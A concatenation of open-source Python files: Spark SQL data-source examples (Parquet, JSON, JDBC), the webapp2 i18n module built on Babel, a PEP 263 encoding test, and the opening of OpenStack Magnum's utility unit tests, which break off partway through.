    squaresDF.write.parquet("data/test_table/key=1")

    # Create another DataFrame in a new partition directory,
    # adding a new column and dropping an existing column
    cubesDF = spark.createDataFrame(sc.parallelize(range(6, 11))
                                    .map(lambda i: Row(single=i, triple=i ** 3)))
    cubesDF.write.parquet("data/test_table/key=2")

    # Read the partitioned table
    mergedDF = spark.read.option("mergeSchema", "true").parquet("data/test_table")
    mergedDF.printSchema()

    # The final schema consists of all 3 columns in the Parquet files together
    # with the partitioning column appeared in the partition directory paths.
    # root
    #  |-- double: long (nullable = true)
    #  |-- single: long (nullable = true)
    #  |-- triple: long (nullable = true)
    #  |-- key: integer (nullable = true)
    # $example off:schema_merging$
def json_dataset_example(spark):
    """Load JSON into a DataFrame, inspect its inferred schema and query it."""
    # $example on:json_dataset$
    # spark is from the previous example.
    sc = spark.sparkContext

    # A JSON dataset is pointed to by path.
    # The path can be either a single text file or a directory storing text files
    path = "examples/src/main/resources/people.json"
    peopleDF = spark.read.json(path)

    # The inferred schema can be visualized using the printSchema() method
    peopleDF.printSchema()
    # root
    #  |-- age: long (nullable = true)
    #  |-- name: string (nullable = true)

    # Creates a temporary view using the DataFrame
    peopleDF.createOrReplaceTempView("people")

    # SQL statements can be run by using the sql methods provided by spark
    teenagerNamesDF = spark.sql("SELECT name FROM people WHERE age BETWEEN 13 AND 19")
    teenagerNamesDF.show()
    # +------+
    # |  name|
    # +------+
    # |Justin|
    # +------+

    # Alternatively, a DataFrame can be created for a JSON dataset represented by
    # an RDD[String] storing one JSON object per string
    jsonStrings = ['{"name":"Yin","address":{"city":"Columbus","state":"Ohio"}}']
    otherPeopleRDD = sc.parallelize(jsonStrings)
    otherPeople = spark.read.json(otherPeopleRDD)
    otherPeople.show()
    # +---------------+----+
    # |        address|name|
    # +---------------+----+
    # |[Columbus,Ohio]| Yin|
    # +---------------+----+
    # $example off:json_dataset$
def jdbc_dataset_example(spark):
    """Load from and save to a JDBC source via the generic and jdbc APIs."""
    # $example on:jdbc_dataset$
    # Note: JDBC loading and saving can be achieved via either the load/save or jdbc methods
    # Loading data from a JDBC source
    jdbcDF = spark.read \
        .format("jdbc") \
        .option("url", "jdbc:postgresql:dbserver") \
        .option("dbtable", "schema.tablename") \
        .option("user", "username") \
        .option("password", "password") \
        .load()

    jdbcDF2 = spark.read \
        .jdbc("jdbc:postgresql:dbserver", "schema.tablename",
              properties={"user": "username", "password": "password"})

    # Saving data to a JDBC source
    jdbcDF.write \
        .format("jdbc") \
        .option("url", "jdbc:postgresql:dbserver") \
        .option("dbtable", "schema.tablename") \
        .option("user", "username") \
        .option("password", "password") \
        .save()

    jdbcDF2.write \
        .jdbc("jdbc:postgresql:dbserver", "schema.tablename",
              properties={"user": "username", "password": "password"})

    # Specifying create table column data types on write
    jdbcDF.write \
        .option("createTableColumnTypes", "name CHAR(64), comments VARCHAR(1024)") \
        .jdbc("jdbc:postgresql:dbserver", "schema.tablename",
              properties={"user": "username", "password": "password"})
    # $example off:jdbc_dataset$
if __name__ == "__main__":
    # Build (or reuse) a SparkSession and run each datasource example in turn.
    spark = SparkSession \
        .builder \
        .appName("Python Spark SQL data source example") \
        .getOrCreate()

    basic_datasource_example(spark)
    parquet_example(spark)
    parquet_schema_merging_example(spark)
    json_dataset_example(spark)
    jdbc_dataset_example(spark)

    spark.stop()
| apache-2.0 |
dcroc16/skunk_works | google_appengine/lib/webapp2-2.5.2/webapp2_extras/i18n.py | 49 | 30343 | # -*- coding: utf-8 -*-
"""
webapp2_extras.i18n
===================
Internationalization support for webapp2.
Several ideas borrowed from tipfy.i18n and Flask-Babel.
:copyright: 2011 by tipfy.org.
:license: Apache Sotware License, see LICENSE for details.
"""
import datetime
import gettext as gettext_stdlib
import babel
from babel import dates
from babel import numbers
from babel import support
try:
# Monkeypatches pytz for gae.
import pytz.gae
except ImportError: # pragma: no cover
pass
import pytz
import webapp2
#: Default configuration values for this module. Keys are:
#:
#: translations_path
#: Path to the translations directory. Default is `locale`.
#:
#: domains
#: List of gettext domains to be used. Default is ``['messages']``.
#:
#: default_locale
#: A locale code to be used as fallback. Default is ``'en_US'``.
#:
#: default_timezone
#: The application default timezone according to the Olson
#: database. Default is ``'UTC'``.
#:
#: locale_selector
#: A function that receives (store, request) and returns a locale
#: to be used for a request. If not defined, uses `default_locale`.
#: Can also be a string in dotted notation to be imported.
#:
#: timezone_selector
#: A function that receives (store, request) and returns a timezone
#: to be used for a request. If not defined, uses `default_timezone`.
#: Can also be a string in dotted notation to be imported.
#:
#: date_formats
#: Default date formats for datetime, date and time.
# Scalar configuration defaults; see the key-by-key description in the
# comment block above.
default_config = {
    'translations_path': 'locale',
    'domains': ['messages'],
    'default_locale': 'en_US',
    'default_timezone': 'UTC',
    'locale_selector': None,
    'timezone_selector': None,
}

# Date/time format defaults. Every '<kind>.<style>' override starts as None
# (meaning "use Babel's locale default"); only the defaults per kind and the
# explicit ISO patterns carry values.
_date_formats = dict.fromkeys(
    '%s.%s' % (kind, style)
    for kind in ('time', 'date', 'datetime')
    for style in ('short', 'medium', 'full', 'long'))
_date_formats.update({
    'time': 'medium',
    'date': 'medium',
    'datetime': 'medium',
    'time.iso': "HH':'mm':'ss",
    'date.iso': "yyyy'-'MM'-'dd",
    'datetime.iso': "yyyy'-'MM'-'dd'T'HH':'mm':'ssZ",
})
default_config['date_formats'] = _date_formats

# Shortcut to the stdlib fallback catalog used when no translations match.
NullTranslations = gettext_stdlib.NullTranslations
class I18nStore(object):
    """Internationalization store.

    Caches loaded translations and configuration to be used between requests.
    """

    #: Configuration key.
    config_key = __name__

    #: A dictionary with all loaded translations.
    translations = None
    #: Path to where translations are stored.
    translations_path = None
    #: Translation domains to merge.
    domains = None
    #: Default locale code.
    default_locale = None
    #: Default timezone code.
    default_timezone = None
    #: Dictionary of default date formats.
    date_formats = None
    #: A callable that returns the locale for a request.
    locale_selector = None
    #: A callable that returns the timezone for a request.
    timezone_selector = None

    def __init__(self, app, config=None):
        """Initializes the i18n store.

        :param app:
            A :class:`webapp2.WSGIApplication` instance.
        :param config:
            A dictionary of configuration values to be overridden. See
            the available keys in :data:`default_config`.
        """
        config = app.config.load_config(self.config_key,
            default_values=default_config, user_values=config,
            required_keys=None)
        self.translations = {}
        self.translations_path = config['translations_path']
        self.domains = config['domains']
        self.default_locale = config['default_locale']
        self.default_timezone = config['default_timezone']
        self.date_formats = config['date_formats']
        self.set_locale_selector(config['locale_selector'])
        self.set_timezone_selector(config['timezone_selector'])

    def set_locale_selector(self, func):
        """Sets the function that defines the locale for a request.

        :param func:
            A callable that receives (store, request) and returns the locale
            for a request. Can also be a string in dotted notation to be
            imported. If None, :meth:`default_locale_selector` is used.
        """
        if func is None:
            self.locale_selector = self.default_locale_selector
        else:
            if isinstance(func, basestring):
                func = webapp2.import_string(func)

            # Functions are descriptors, so bind it to this instance with
            # __get__.
            self.locale_selector = func.__get__(self, self.__class__)

    def set_timezone_selector(self, func):
        """Sets the function that defines the timezone for a request.

        :param func:
            A callable that receives (store, request) and returns the
            timezone for a request. Can also be a string in dotted notation
            to be imported. If None, :meth:`default_timezone_selector` is
            used.
        """
        if func is None:
            self.timezone_selector = self.default_timezone_selector
        else:
            if isinstance(func, basestring):
                func = webapp2.import_string(func)

            # Bind the plain function to this instance (see above).
            self.timezone_selector = func.__get__(self, self.__class__)

    def default_locale_selector(self, request):
        # Fallback selector: ignore the request, use the configured default.
        return self.default_locale

    def default_timezone_selector(self, request):
        # Fallback selector: ignore the request, use the configured default.
        return self.default_timezone

    def get_translations(self, locale):
        """Returns a translation catalog for a locale.

        :param locale:
            A locale code.
        :returns:
            A ``babel.support.Translations`` instance, or
            ``gettext.NullTranslations`` if none was found.
        """
        trans = self.translations.get(locale)
        if not trans:
            locales = (locale, self.default_locale)
            trans = self.load_translations(self.translations_path, locales,
                                           self.domains)
            if not webapp2.get_app().debug:
                # Only cache outside debug mode, so catalog edits show up
                # immediately during development.
                self.translations[locale] = trans

        return trans

    def load_translations(self, dirname, locales, domains):
        """Loads a translation catalog.

        :param dirname:
            Path to where translations are stored.
        :param locales:
            A list of locale codes.
        :param domains:
            A list of domains to be merged.
        :returns:
            A ``babel.support.Translations`` instance, or
            ``gettext.NullTranslations`` if none was found.
        """
        trans = None
        trans_null = None
        for domain in domains:
            _trans = support.Translations.load(dirname, locales, domain)
            if isinstance(_trans, NullTranslations):
                # Remember the null catalog as a last-resort fallback, but
                # never merge it into a real one.
                trans_null = _trans
                continue
            elif trans is None:
                trans = _trans
            else:
                trans.merge(_trans)

        return trans or trans_null or NullTranslations()
class I18n(object):
    """Internationalization provider for a single request."""

    #: A reference to :class:`I18nStore`.
    store = None
    #: The current locale code.
    locale = None
    #: The current translations.
    translations = None
    #: The current timezone code.
    timezone = None
    #: The current tzinfo object.
    tzinfo = None

    def __init__(self, request):
        """Initializes the i18n provider for a request.

        :param request:
            A :class:`webapp2.Request` instance.
        """
        self.store = store = get_store(app=request.app)
        self.set_locale(store.locale_selector(request))
        self.set_timezone(store.timezone_selector(request))

    def set_locale(self, locale):
        """Sets the locale code for this request and loads its catalog.

        :param locale:
            A locale code.
        """
        self.locale = locale
        self.translations = self.store.get_translations(locale)

    def set_timezone(self, timezone):
        """Sets the timezone code for this request.

        :param timezone:
            A timezone code.
        """
        self.timezone = timezone
        self.tzinfo = pytz.timezone(timezone)

    def gettext(self, string, **variables):
        """Translates a given string according to the current locale.

        :param string:
            The string to be translated.
        :param variables:
            Variables to %-format the returned string.
        :returns:
            The translated string.
        """
        if variables:
            return self.translations.ugettext(string) % variables

        return self.translations.ugettext(string)

    def ngettext(self, singular, plural, n, **variables):
        """Translates a possible pluralized string according to the current
        locale.

        :param singular:
            The singular form of the string to be translated.
        :param plural:
            The plural form of the string to be translated.
        :param n:
            An integer indicating if this is a singular or plural. If greater
            than 1, it is a plural.
        :param variables:
            Variables to %-format the returned string.
        :returns:
            The translated string.
        """
        if variables:
            return self.translations.ungettext(singular, plural, n) % variables

        return self.translations.ungettext(singular, plural, n)

    def to_local_timezone(self, datetime):
        """Returns a datetime object converted to the local timezone.
        Naive datetimes are assumed to be in UTC.

        :param datetime:
            A ``datetime`` object.
        :returns:
            A ``datetime`` object normalized to a timezone.
        """
        if datetime.tzinfo is None:
            datetime = datetime.replace(tzinfo=pytz.UTC)

        # normalize() fixes the offset when the conversion crosses a DST
        # boundary.
        return self.tzinfo.normalize(datetime.astimezone(self.tzinfo))

    def to_utc(self, datetime):
        """Returns a datetime object converted to UTC and without tzinfo.
        Naive datetimes are assumed to be in the current timezone.

        :param datetime:
            A ``datetime`` object.
        :returns:
            A naive ``datetime`` object (no timezone), converted to UTC.
        """
        if datetime.tzinfo is None:
            datetime = self.tzinfo.localize(datetime)

        return datetime.astimezone(pytz.UTC).replace(tzinfo=None)

    def _get_format(self, key, format):
        """A helper for the datetime formatting functions. Returns a format
        name or pattern to be used by Babel date format functions.

        :param key:
            A format key to be get from config. Valid values are "date",
            "datetime" or "time".
        :param format:
            The format to be returned. Valid values are "short", "medium",
            "long", "full" or a custom date/time pattern.
        :returns:
            A format name or pattern to be used by Babel date format
            functions.
        """
        if format is None:
            format = self.store.date_formats.get(key)

        if format in ('short', 'medium', 'full', 'long', 'iso'):
            # A named style may be overridden per-key in the config (e.g.
            # 'date.short'); only replace it when an override exists.
            rv = self.store.date_formats.get('%s.%s' % (key, format))
            if rv is not None:
                format = rv

        return format

    def format_date(self, date=None, format=None, rebase=True):
        """Returns a date formatted according to the given pattern and
        following the current locale.

        :param date:
            A ``date`` or ``datetime`` object. If None, the current date in
            UTC is used.
        :param format:
            The format to be returned. Valid values are "short" (11/10/09),
            "medium" (Nov 10, 2009), "long" (November 10, 2009), "full"
            (Tuesday, November 10, 2009) or a custom date/time pattern.
        :param rebase:
            If True, converts the date to the current :attr:`timezone`.
        :returns:
            A formatted date in unicode.
        """
        format = self._get_format('date', format)

        # Only datetimes carry a time of day that can shift the date when
        # rebased; plain dates are formatted as-is.
        if rebase and isinstance(date, datetime.datetime):
            date = self.to_local_timezone(date)

        return dates.format_date(date, format, locale=self.locale)

    def format_datetime(self, datetime=None, format=None, rebase=True):
        """Returns a date and time formatted according to the given pattern
        and following the current locale and timezone.

        :param datetime:
            A ``datetime`` object. If None, the current date and time in UTC
            is used.
        :param format:
            The format to be returned. Valid values are "short"
            (11/10/09 4:36 PM), "medium" (Nov 10, 2009 4:36:05 PM), "long",
            "full" or a custom date/time pattern.
        :param rebase:
            If True, converts the datetime to the current :attr:`timezone`.
        :returns:
            A formatted date and time in unicode.
        """
        format = self._get_format('datetime', format)

        kwargs = {}
        if rebase:
            # Babel performs the timezone rebase itself when tzinfo is given.
            kwargs['tzinfo'] = self.tzinfo

        return dates.format_datetime(datetime, format, locale=self.locale,
                                     **kwargs)

    def format_time(self, time=None, format=None, rebase=True):
        """Returns a time formatted according to the given pattern and
        following the current locale and timezone.

        :param time:
            A ``time`` or ``datetime`` object. If None, the current
            time in UTC is used.
        :param format:
            The format to be returned. Valid values are "short" (4:36 PM),
            "medium" (4:36:05 PM), "long", "full" or a custom date/time
            pattern.
        :param rebase:
            If True, converts the time to the current :attr:`timezone`.
        :returns:
            A formatted time in unicode.
        """
        format = self._get_format('time', format)

        kwargs = {}
        if rebase:
            kwargs['tzinfo'] = self.tzinfo

        return dates.format_time(time, format, locale=self.locale, **kwargs)

    def format_timedelta(self, datetime_or_timedelta, granularity='second',
                         threshold=.85):
        """Formats the elapsed time from the given date to now or the given
        timedelta. This currently requires an unreleased development version
        of Babel.

        :param datetime_or_timedelta:
            A ``timedelta`` object representing the time difference to
            format, or a ``datetime`` object in UTC.
        :param granularity:
            Determines the smallest unit that should be displayed, the value
            can be one of "year", "month", "week", "day", "hour", "minute"
            or "second".
        :param threshold:
            Factor that determines at which point the presentation switches
            to the next higher unit.
        :returns:
            A string with the elapsed time.
        """
        if isinstance(datetime_or_timedelta, datetime.datetime):
            # Convert an absolute UTC datetime into "elapsed since now".
            datetime_or_timedelta = datetime.datetime.utcnow() - \
                datetime_or_timedelta

        return dates.format_timedelta(datetime_or_timedelta, granularity,
                                      threshold=threshold,
                                      locale=self.locale)

    def format_number(self, number):
        """Returns the given number formatted for the current locale, e.g.
        ``1099`` -> ``u'1,099'`` in ``en_US``.

        :param number:
            The number to format.
        :returns:
            The formatted number.
        """
        return numbers.format_number(number, locale=self.locale)

    def format_decimal(self, number, format=None):
        """Returns the given decimal number formatted for the current
        locale, using the locale's thousands grouping and decimal separator,
        e.g. ``12345.5`` -> ``u'12,345.5'`` in ``en_US`` but ``u'12.345'``
        for ``12345`` in ``de``.

        :param number:
            The number to format.
        :param format:
            Notation format.
        :returns:
            The formatted decimal number.
        """
        return numbers.format_decimal(number, format=format,
                                      locale=self.locale)

    def format_currency(self, number, currency, format=None):
        """Returns a formatted currency value, e.g. ``(1099.98, 'USD')`` ->
        ``u'$1,099.98'`` in ``en_US``. The pattern can also be specified
        explicitly via *format*.

        :param number:
            The number to format.
        :param currency:
            The currency code.
        :param format:
            Notation format.
        :returns:
            The formatted currency value.
        """
        return numbers.format_currency(number, currency, format=format,
                                       locale=self.locale)

    def format_percent(self, number, format=None):
        """Returns the formatted percent value for the current locale, e.g.
        ``0.34`` -> ``u'34%'`` in ``en_US``. The format pattern can also be
        specified explicitly via *format*.

        :param number:
            The percent number to format.
        :param format:
            Notation format.
        :returns:
            The formatted percent number.
        """
        return numbers.format_percent(number, format=format,
                                      locale=self.locale)

    def format_scientific(self, number, format=None):
        """Returns the value formatted in scientific notation for the
        current locale, e.g. ``10000`` -> ``u'1E4'`` in ``en_US``. The
        format pattern can also be specified explicitly via *format*.

        :param number:
            The number to format.
        :param format:
            Notation format.
        :returns:
            Value formatted in scientific notation.
        """
        return numbers.format_scientific(number, format=format,
                                         locale=self.locale)

    def parse_date(self, string):
        """Parses a date from a string.

        This function uses the date format for the locale as a hint to
        determine the order in which the date fields appear in the string,
        e.g. ``'4/1/04'`` -> ``datetime.date(2004, 4, 1)`` in ``en_US``.

        :param string:
            The string containing the date.
        :returns:
            The parsed date object.
        """
        return dates.parse_date(string, locale=self.locale)

    def parse_datetime(self, string):
        """Parses a date and time from a string.

        This function uses the date and time formats for the locale as a
        hint to determine the order in which the time fields appear in the
        string.

        :param string:
            The string containing the date and time.
        :returns:
            The parsed datetime object.
        """
        return dates.parse_datetime(string, locale=self.locale)

    def parse_time(self, string):
        """Parses a time from a string.

        This function uses the time format for the locale as a hint to
        determine the order in which the time fields appear in the string,
        e.g. ``'15:30:00'`` -> ``datetime.time(15, 30)`` in ``en_US``.

        :param string:
            The string containing the time.
        :returns:
            The parsed time object.
        """
        return dates.parse_time(string, locale=self.locale)

    def parse_number(self, string):
        """Parses a localized number string into a long integer, e.g.
        ``'1,099'`` -> ``1099L`` in ``en_US``.

        :param string:
            The string to parse.
        :returns:
            The parsed number.
        :raises:
            ``NumberFormatError`` if the string can not be converted to a
            number.
        """
        return numbers.parse_number(string, locale=self.locale)

    def parse_decimal(self, string):
        """Parses a localized decimal string into a float, e.g.
        ``'1,099.98'`` -> ``1099.98`` in ``en_US``.

        :param string:
            The string to parse.
        :returns:
            The parsed decimal number.
        :raises:
            ``NumberFormatError`` if the string can not be converted to a
            decimal number.
        """
        return numbers.parse_decimal(string, locale=self.locale)

    def get_timezone_location(self, dt_or_tzinfo):
        """Returns a representation of the given timezone using "location
        format".

        The result depends on both the local display name of the country and
        the city associated with the time zone, e.g.
        ``u"Kanada (St. John's)"`` for ``America/St_Johns`` in ``de_DE``.
        If the timezone is associated with a country that uses only a single
        timezone, just the localized country name is returned, e.g.
        ``u'Deutschland'`` for ``Europe/Berlin`` via
        ``get_timezone_location``.

        :param dt_or_tzinfo:
            The ``datetime`` or ``tzinfo`` object that determines
            the timezone; if None, the current date and time in UTC is
            assumed.
        :returns:
            The localized timezone name using location format.
        """
        return dates.get_timezone_name(dt_or_tzinfo, locale=self.locale)
# Module-level convenience API: each function below delegates to the
# request-scoped :class:`I18n` instance returned by :func:`get_i18n`.

def gettext(string, **variables):
    """See :meth:`I18n.gettext`."""
    return get_i18n().gettext(string, **variables)


def ngettext(singular, plural, n, **variables):
    """See :meth:`I18n.ngettext`."""
    return get_i18n().ngettext(singular, plural, n, **variables)


def to_local_timezone(datetime):
    """See :meth:`I18n.to_local_timezone`."""
    return get_i18n().to_local_timezone(datetime)


def to_utc(datetime):
    """See :meth:`I18n.to_utc`."""
    return get_i18n().to_utc(datetime)


def format_date(date=None, format=None, rebase=True):
    """See :meth:`I18n.format_date`."""
    return get_i18n().format_date(date, format, rebase)


def format_datetime(datetime=None, format=None, rebase=True):
    """See :meth:`I18n.format_datetime`."""
    return get_i18n().format_datetime(datetime, format, rebase)


def format_time(time=None, format=None, rebase=True):
    """See :meth:`I18n.format_time`."""
    return get_i18n().format_time(time, format, rebase)


def format_timedelta(datetime_or_timedelta, granularity='second',
                     threshold=.85):
    """See :meth:`I18n.format_timedelta`."""
    return get_i18n().format_timedelta(datetime_or_timedelta,
                                       granularity, threshold)


def format_number(number):
    """See :meth:`I18n.format_number`."""
    return get_i18n().format_number(number)


def format_decimal(number, format=None):
    """See :meth:`I18n.format_decimal`."""
    return get_i18n().format_decimal(number, format)


def format_currency(number, currency, format=None):
    """See :meth:`I18n.format_currency`."""
    return get_i18n().format_currency(number, currency, format)


def format_percent(number, format=None):
    """See :meth:`I18n.format_percent`."""
    return get_i18n().format_percent(number, format)


def format_scientific(number, format=None):
    """See :meth:`I18n.format_scientific`."""
    return get_i18n().format_scientific(number, format)


def parse_date(string):
    """See :meth:`I18n.parse_date`"""
    return get_i18n().parse_date(string)


def parse_datetime(string):
    """See :meth:`I18n.parse_datetime`."""
    return get_i18n().parse_datetime(string)


def parse_time(string):
    """See :meth:`I18n.parse_time`."""
    return get_i18n().parse_time(string)


def parse_number(string):
    """See :meth:`I18n.parse_number`."""
    return get_i18n().parse_number(string)


def parse_decimal(string):
    """See :meth:`I18n.parse_decimal`."""
    return get_i18n().parse_decimal(string)


def get_timezone_location(dt_or_tzinfo):
    """See :meth:`I18n.get_timezone_location`."""
    return get_i18n().get_timezone_location(dt_or_tzinfo)


def lazy_gettext(string, **variables):
    """A lazy version of :func:`gettext`.

    :param string:
        The string to be translated.
    :param variables:
        Variables to format the returned string.
    :returns:
        A ``babel.support.LazyProxy`` object that when accessed translates
        the string.
    """
    return support.LazyProxy(gettext, string, **variables)
# Aliases.
_ = gettext
_lazy = lazy_gettext


# Factories -------------------------------------------------------------------

#: Key used to store :class:`I18nStore` in the app registry.
_store_registry_key = 'webapp2_extras.i18n.I18nStore'
#: Key used to store :class:`I18n` in the request registry.
_i18n_registry_key = 'webapp2_extras.i18n.I18n'
def get_store(factory=I18nStore, key=_store_registry_key, app=None):
    """Returns an instance of :class:`I18nStore` from the app registry.

    It'll try to get it from the current app registry, and if it is not
    registered it'll be instantiated and registered. A second call to this
    function will return the same instance.

    :param factory:
        The callable used to build and register the instance if it is not
        yet registered. The default is the class :class:`I18nStore` itself.
    :param key:
        The key used to store the instance in the registry. A default is
        used if it is not set.
    :param app:
        A :class:`webapp2.WSGIApplication` instance used to store the
        instance. The active app is used if it is not set.
    """
    app = app or webapp2.get_app()
    store = app.registry.get(key)
    if not store:
        store = app.registry[key] = factory(app)

    return store


def set_store(store, key=_store_registry_key, app=None):
    """Sets an instance of :class:`I18nStore` in the app registry.

    :param store:
        An instance of :class:`I18nStore`.
    :param key:
        The key used to retrieve the instance from the registry. A default
        is used if it is not set.
    :param app:
        A :class:`webapp2.WSGIApplication` instance used to retrieve the
        instance. The active app is used if it is not set.
    """
    app = app or webapp2.get_app()
    app.registry[key] = store
def get_i18n(factory=I18n, key=_i18n_registry_key, request=None):
    """Returns an instance of :class:`I18n` from the request registry.

    It'll try to get it from the current request registry, and if it is not
    registered it'll be instantiated and registered. A second call to this
    function will return the same instance.

    :param factory:
        The callable used to build and register the instance if it is not
        yet registered. The default is the class :class:`I18n` itself.
    :param key:
        The key used to store the instance in the registry. A default is
        used if it is not set.
    :param request:
        A :class:`webapp2.Request` instance used to store the instance. The
        active request is used if it is not set.
    """
    request = request or webapp2.get_request()
    i18n = request.registry.get(key)
    if not i18n:
        i18n = request.registry[key] = factory(request)

    return i18n


def set_i18n(i18n, key=_i18n_registry_key, request=None):
    """Sets an instance of :class:`I18n` in the request registry.

    :param i18n:
        An instance of :class:`I18n`.
    :param key:
        The key used to retrieve the instance from the registry. A default
        is used if it is not set.
    :param request:
        A :class:`webapp2.Request` instance used to retrieve the instance.
        The active request is used if it is not set.
    """
    request = request or webapp2.get_request()
    request.registry[key] = i18n
| mit |
ojii/sandlib | lib/lib-python/2.7/test/test_pep263.py | 85 | 1370 | # -*- coding: koi8-r -*-
import unittest
from test import test_support
class PEP263Test(unittest.TestCase):
    """Tests for PEP 263 source-encoding handling.

    NOTE: this file itself is declared ``koi8-r`` (see the coding cookie at
    the top) and uses Python 2 syntax (``exec c in d``).
    """

    def test_pep263(self):
        # Unicode literals in this koi8-r source must decode per the coding
        # cookie before being re-encoded to UTF-8.
        self.assertEqual(
            u"ðÉÔÏÎ".encode("utf-8"),
            '\xd0\x9f\xd0\xb8\xd1\x82\xd0\xbe\xd0\xbd'
        )
        # A backslash before a non-ASCII character is preserved literally.
        self.assertEqual(
            u"\ð".encode("utf-8"),
            '\\\xd0\x9f'
        )

    def test_compilestring(self):
        # see #1882: compile() must honor a coding declaration inside the
        # compiled string.
        c = compile("\n# coding: utf-8\nu = u'\xc3\xb3'\n", "dummy", "exec")
        d = {}
        exec c in d
        self.assertEqual(d['u'], u'\xf3')

    def test_issue3297(self):
        # A real \U escape and an escaped backslash-U must compile to equal
        # values of equal length.
        c = compile("a, b = '\U0001010F', '\\U0001010F'", "dummy", "exec")
        d = {}
        exec(c, d)
        self.assertEqual(d['a'], d['b'])
        self.assertEqual(len(d['a']), len(d['b']))

    def test_issue7820(self):
        # Ensure that check_bom() restores all bytes in the right order if
        # check_bom() fails in pydebug mode: a buffer starts with the first
        # byte of a valid BOM, but next bytes are different

        # one byte in common with the UTF-16-LE BOM
        self.assertRaises(SyntaxError, eval, '\xff\x20')

        # two bytes in common with the UTF-8 BOM
        self.assertRaises(SyntaxError, eval, '\xef\xbb\x20')
def test_main():
    """regrtest entry point: run the PEP 263 test case."""
    test_support.run_unittest(PEP263Test)


if __name__ == "__main__":
    test_main()
| bsd-3-clause |
openstack/magnum | magnum/tests/unit/common/test_utils.py | 2 | 11275 | # Copyright 2011 Justin Santa Barbara
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import os
import os.path
import shutil
import tempfile
from unittest import mock
from oslo_concurrency import processutils
from oslo_utils import netutils
from magnum.common import exception
from magnum.common import utils
import magnum.conf
from magnum.tests import base
CONF = magnum.conf.CONF
class UtilsTestCase(base.TestCase):
    """Tests for the quantity parsers and CA-file helper in
    :mod:`magnum.common.utils`.
    """

    def test_get_k8s_quantity(self):
        # Kubernetes quantities: binary suffix (Ki), scientific notation
        # (E, E-3, E+6) and SI suffixes (k, m) all normalize to a float.
        self.assertEqual(1024000.0, utils.get_k8s_quantity('1000Ki'))
        self.assertEqual(0.001, utils.get_k8s_quantity('1E-3'))
        self.assertEqual(0.5, utils.get_k8s_quantity('0.0005k'))
        self.assertEqual(0.5, utils.get_k8s_quantity('500m'))
        self.assertEqual(1300000.0, utils.get_k8s_quantity('1.3E+6'))
        self.assertEqual(1300000.0, utils.get_k8s_quantity('1.3E6'))
        # Malformed quantities must raise instead of returning garbage.
        self.assertRaises(exception.UnsupportedK8sQuantityFormat,
                          utils.get_k8s_quantity, '1E1E')

    def test_get_docker_quantity(self):
        # Docker sizes use lowercase binary suffixes b/k/m/g (no suffix
        # means bytes).
        self.assertEqual(512, utils.get_docker_quantity('512'))
        self.assertEqual(512, utils.get_docker_quantity('512b'))
        self.assertEqual(512 * 1024, utils.get_docker_quantity('512k'))
        self.assertEqual(512 * 1024 * 1024, utils.get_docker_quantity('512m'))
        self.assertEqual(512 * 1024 * 1024 * 1024,
                         utils.get_docker_quantity('512g'))
        # Doubled or uppercase suffixes are rejected.
        self.assertRaises(exception.UnsupportedDockerQuantityFormat,
                          utils.get_docker_quantity, '512bb')
        self.assertRaises(exception.UnsupportedDockerQuantityFormat,
                          utils.get_docker_quantity, '512B')

    def test_get_openstack_ca(self):
        # NOTE: renamed from test_get_openstasck_ca (typo). unittest
        # discovers tests by the ``test_`` prefix, so nothing references
        # the old name.

        # openstack_ca_file is empty
        self.assertEqual('', utils.get_openstack_ca())

        # openstack_ca_file is set but the file doesn't exist
        CONF.set_override('openstack_ca_file',
                          '/tmp/invalid-ca.pem',
                          group='drivers')
        self.assertRaises(IOError, utils.get_openstack_ca)

        # openstack_ca_file is set and the file exists
        CONF.set_override('openstack_ca_file',
                          '/tmp/invalid-ca.pem',
                          group='drivers')
        with mock.patch('magnum.common.utils.open',
                        mock.mock_open(read_data="CERT"), create=True):
            self.assertEqual('CERT', utils.get_openstack_ca())
class ExecuteTestCase(base.TestCase):
    """Tests for utils.execute(), a thin wrapper around processutils.execute()."""

    def test_retry_on_failure(self):
        """An always-failing command is retried ``attempts`` times and stdin
        is re-sent on every attempt (verified by the helper shell script)."""
        fd, tmpfilename = tempfile.mkstemp()
        _, tmpfilename2 = tempfile.mkstemp()
        try:
            fp = os.fdopen(fd, 'w+')
            fp.write('''#!/bin/sh
# If stdin fails to get passed during one of the runs, make a note.
if ! grep -q foo
then
    echo 'failure' > "$1"
fi
# If stdin has failed to get passed during this or a previous run, exit early.
if grep failure "$1"
then
    exit 1
fi
runs="$(cat $1)"
if [ -z "$runs" ]
then
    runs=0
fi
runs=$(($runs + 1))
echo $runs > "$1"
exit 1
''')
            fp.close()
            os.chmod(tmpfilename, 0o755)
            try:
                self.assertRaises(processutils.ProcessExecutionError,
                                  utils.execute,
                                  tmpfilename, tmpfilename2, attempts=10,
                                  process_input=b'foo',
                                  delay_on_retry=False)
            except OSError as e:
                if e.errno == errno.EACCES:
                    self.skipTest("Permissions error detected. "
                                  "Are you running with a noexec /tmp?")
                else:
                    raise
            with open(tmpfilename2, 'r') as fp:
                runs = fp.read()
            self.assertNotEqual(runs.strip(), 'failure', 'stdin did not '
                                                         'always get passed '
                                                         'correctly')
            runs = int(runs.strip())
            self.assertEqual(10, runs,
                             'Ran %d times instead of 10.' % runs)
        finally:
            os.unlink(tmpfilename)
            os.unlink(tmpfilename2)

    def test_unknown_kwargs_raises_error(self):
        """Unrecognized keyword arguments are rejected."""
        self.assertRaises(processutils.UnknownArgumentError,
                          utils.execute,
                          '/usr/bin/env', 'true',
                          this_is_not_a_valid_kwarg=True)

    def test_check_exit_code_boolean(self):
        """check_exit_code=False swallows a non-zero exit; True raises."""
        utils.execute('/usr/bin/env', 'false', check_exit_code=False)
        self.assertRaises(processutils.ProcessExecutionError,
                          utils.execute,
                          '/usr/bin/env', 'false', check_exit_code=True)

    def test_no_retry_on_success(self):
        """A command that succeeds on the first try is not re-run
        (the helper script exits 1 if it is executed twice)."""
        fd, tmpfilename = tempfile.mkstemp()
        _, tmpfilename2 = tempfile.mkstemp()
        try:
            fp = os.fdopen(fd, 'w+')
            fp.write('''#!/bin/sh
# If we've already run, bail out.
grep -q foo "$1" && exit 1
# Mark that we've run before.
echo foo > "$1"
# Check that stdin gets passed correctly.
